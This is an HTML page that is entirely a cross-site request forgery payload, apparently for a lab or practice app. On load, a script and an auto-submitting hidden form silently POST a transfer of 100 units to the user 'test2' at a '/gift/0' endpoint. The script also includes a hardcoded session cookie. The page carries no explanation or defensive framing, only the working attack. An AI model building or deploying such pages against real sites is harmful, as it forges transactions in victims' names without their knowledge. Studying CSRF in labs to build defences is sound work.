<html lang="en">
<head>
     <script>
    window.onload = function() {
      fetch('/gift/0', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded',
          'Cookie': 'sessionid=6m2bqfcpeumbub34thc4pjmeohteaqmo'
        },
        body: 'amount=100&username=test2',
        credentials: 'include'
      });
    };
  </script>

</head>
    <body onload="document.forms[0].submit();">

                <form action="/gift/0" method="post">
                    <input type="hidden" name="amount" id="amount" value="100">
                    <input type="hidden" name="username" id="username" value="test2">
                    <noscript>
                      <input type="submit" value="Submit" >
                    </noscript>
                </form>
    </body>
</html>